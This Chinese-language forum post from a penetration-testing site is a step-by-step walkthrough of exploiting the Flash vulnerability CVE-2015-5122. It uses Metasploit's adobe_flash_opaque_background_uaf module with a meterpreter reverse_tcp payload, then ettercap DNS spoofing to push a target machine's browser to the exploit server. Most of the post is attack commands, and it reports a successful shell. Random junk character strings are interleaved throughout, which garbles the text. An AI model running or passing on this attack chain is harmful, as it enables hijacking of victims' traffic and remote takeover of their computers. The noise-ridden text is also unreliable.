中国网络渗透测试联盟

标题: cve2015-5122漏洞实例演示虚拟机 [打印本页]

作者: admin    时间: 2018-10-20 20:28
标题: cve2015-5122漏洞实例演示虚拟机

6 r1 W1 S9 W. }8 ^ 二、cve2015-5122漏洞实例演示虚拟机 0 U, o" ]* L; h8 x; T; g

/ a- v6 e+ ]2 K1 r( b# u0 ]' i! r

- _* L8 r+ i0 b; Z8 e( F# `& l   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: 6 y: j$ a0 e; ~2 J9 }' j- W

9 d' s4 h4 n" c' W7 `

3 q! I1 s( V0 F- n b search cve-2015-5122如图: 0 }7 W# O0 j9 F% m; v/ _

. p9 I8 \0 n1 b( Z+ J

) v* s5 [1 A) u% o0 Y5 ]   ; y C" a7 ]0 c& j n% @

K O9 c: J. `

! l7 Y- M$ W$ Y: U8 ^ 下面我们敲如下命令: 0 `4 `& g# R7 C) v/ Y

* v( D/ {: B6 ~6 H$ H) p# L

o0 x4 v: A8 I- G4 b* ~, q, ` use exploit/multi/browser/adobe_flash_opaque_background_uaf # Q* l+ b& X- F# Q5 M( t# k6 Q2 V$ f

) V1 h3 p2 Y5 P' ]8 i

, Q2 H) u& o9 b) s8 Y* m set PAYLOAD windows/meterpreter/reverse_tcp ' e2 \" `/ l/ C3 |2 y) h9 ~

8 l5 k2 R* B4 ~" D1 O$ O

- s9 z+ _: k% q q8 H$ R4 D7 F set LHOST 192.168.0.109 . N5 w# ~2 a0 e& B# F0 f+ o

" F, G- ^, B0 j* s Q6 S- j% ]

' R( A* c$ @! w2 R set URIPATH /                        /*根目录*/ / U( \: C/ O: k

) p7 ^+ e) Y. i. a0 r+ B8 _9 D2 E

. I' j8 N& d9 t1 B2 V4 }: ? set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 + `6 h+ |" g( r4 k& t$ i

8 |0 g4 k/ K, _5 R: g" a8 M

2 S; n8 X2 [# ` set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 + C! {, I, V4 M, d

" C2 j n! O" ?- Z1 Z. {

+ i5 z& b( `3 r1 K _1 y 然后show options如图: ) C# B. A( }( v7 e r7 G

2 B# m8 T" M3 V/ m% F

$ w% p7 H' C; f1 A$ k) s \$ \   " W* ~8 e/ R3 B* h7 B& J' z

% V6 S; a; V: V+ g9 c6 ^

4 g7 c3 n0 `4 r8 Y& @ c 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
6 Y( z, }8 o; e, o
9 G6 F( [ A8 l4 Z$ I$ f5 z9 \

. _2 b8 L9 m: Q

; T @: M5 a6 H1 s% y( G 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 # o( D g( w" V! _3 w

; j5 Z) Q$ Q' @& l9 k

! n& V0 F3 W5 F2 B Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf 7 H( w) n H7 y$ U1 u/ m1 b6 r

7 }$ `; R4 {- k( p$ |: `4 N% Z

' g3 c& h3 B, Q+ {# @   3 G% V- g- }+ a

* v9 x, t& x7 ^+ U9 f) K2 i3 x

, ~) O! a6 d" P: E* a3 \ 成功了,这时候我们断开ettercap,如图: & p9 h% u6 f% o% A* t( {# p

7 G5 B5 ^7 W- ]% B8 B8 J

: [$ c: O/ s- [   3 ^$ t' q) B. `4 b

9 z7 N$ Y/ r5 R, |9 w& q

) k: ?8 \% G' y# e9 @( W7 f, N Screenshot如图: # ~- H) @! ^# Y" E7 \5 ~5 ^& i

. S# ?& p& x8 Y* e1 v' |% U( q2 m

; S# R E% R Y   $ m1 G& [2 ^) a v' s

1 k y, J1 f5 w

% f4 y. K; |& `! d ( d4 \ H/ I4 H8 R8 M






欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2